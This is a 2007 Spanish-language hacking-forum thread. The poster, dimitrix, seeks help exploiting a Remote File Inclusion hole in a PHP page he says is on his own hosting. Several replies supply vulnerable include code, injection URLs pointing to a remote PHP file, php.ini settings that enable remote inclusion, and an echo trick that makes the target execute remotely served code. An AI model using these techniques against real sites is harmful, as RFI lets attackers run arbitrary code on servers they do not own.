Foro de elhacker.net

Seguridad Informática => Nivel Web => Mensaje iniciado por: dimitrix en 9 Abril 2007, 22:32 pm


Título: Ayuda con un RFI
Publicado por: dimitrix en 9 Abril 2007, 22:32 pm
Haber, mi intencion es hacerme un RFI (Remote File incluse) a esta dirección:
http://dimitrix.webcindario.com/prueba/index.php

el codigo del index.php es:
Código:
<p>Esta web es inCrackeable</p>
<?php
include("$canal.php")
?>

y le quiero hacer un include con este archivo:
http://www.dimitrix.es/canal.php/ que tiene de codigo esto:
Código:
<html>

<?php
$fp = fopen("archivo.txt","w+");
fclose($fp);
?>

con esto conseguiri crear un archivo llamado archivo.txt en
http://dimitrix.webcindario.com/prueba/

yo lo hago de la siguiente forma:
http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.php

pero como que no me va y me da error, como seria¿?

no es nada ilegal ya q los housting son mios.
Gracias.

Título: Re: Ayuda con un RFI
Publicado por: Zinc en 10 Abril 2007, 03:10 am
La shell no deberia ser, un archivo de texto?.  :o

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????

Saludos!!

Título: Re: Ayuda con un RFI
Publicado por: dimitrix en 10 Abril 2007, 13:03 pm
no por que si te fijas el include pide el archivo canal.php

Título: Re: Ayuda con un RFI
Publicado por: alone-in-the-chat en 10 Abril 2007, 18:08 pm
Prueba kitandole el ".php"
del final
ademas debes de tener habilitado global register en ON al igual que allow_url_fopen si no no funcionara

Código:

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal


saludos

Título: Re: Ayuda con un RFI
Publicado por: dimitrix en 10 Abril 2007, 19:21 pm
haber para para lo que me has dixo de register ON allow_url:fopen...

seria crear un php.ini y que dentro tenga esto ¿?

register_globals = on
allow_url_fopen = on


Quedaria así ¿?

Título: Re: Ayuda con un RFI
Publicado por: alone-in-the-chat en 10 Abril 2007, 20:25 pm
Se supone que ya tienes el php.ini 
Leete esto

http://www.php.net/manual/en/ini.core.php#ini.register-globals
 (http://www.php.net/manual/en/ini.core.php#ini.register-globals)

Título: Re: Ayuda con un RFI
Publicado por: Azielito en 10 Abril 2007, 21:00 pm
Ponelo asi
Código:
<p>Esta web es inCrackeable</p>
<?php
$canal = $_GET['canal'];
include("$canal".".php")
?>
y entonces haces
Código:
index.php?canal=http://www.dimitrix.es/canal

Título: Re: Ayuda con un RFI
Publicado por: dimitrix en 10 Abril 2007, 21:21 pm
nada de nada, pero gracias a todos.

Título: Re: Ayuda con un RFI
Publicado por: Universal SAC en 22 Abril 2007, 20:37 pm
Código:
<p>Esta web es inCrackeable</p>
<?php
$canal = $_GET['canal'];
include("$canal".".php")
?>

Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.

Título: Re: Ayuda con un RFI
Publicado por: yeikos en 22 Abril 2007, 21:59 pm
Cita de: Zinc en 10 Abril 2007, 03:10 am
La shell no deberia ser, un archivo de texto?.  :o

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????

Saludos!!

Cita de: Universal SAC en 22 Abril 2007, 20:37 pm
Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.


Os equivocais, mientras el código se encuentre en texto plano no habrá ningún problema...

Código:
<?php
echo "<?php
\$fp = fopen(\"archivo.txt\",\"w+\");
fclose(\$fp);
?>";
?>

allow_url_include = On

Título: Re: Ayuda con un RFI
Publicado por: Universal SAC en 22 Abril 2007, 23:34 pm
Cita de: YeIk0s en 22 Abril 2007, 21:59 pm
Os equibocais, mientras el código se encuentre en texto plano no habrá ningún problema...

Código:
<?php
echo "<?php
\$fp = fopen(\"archivo.txt\",\"w+\");
fclose(\$fp);
?>";
?>

allow_url_include = On

 :o :o :o :o :o
WOOOOOOOOOW!! Jamaz había logrado mostrar código php (texto plano) como resultado de interpretar código php! En serio que esto es muy astuto!!! *****, genial... gracias por la corrección y el ejemplo  ;D

Título: Re: Ayuda con un RFI
Publicado por: dimitrix en 23 Abril 2007, 17:40 pm
creo q el fallo esta en mi@ xq algunas cosas no van como hacer una web/proxy y con el mismo codigo en el de pago si q me va.


Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines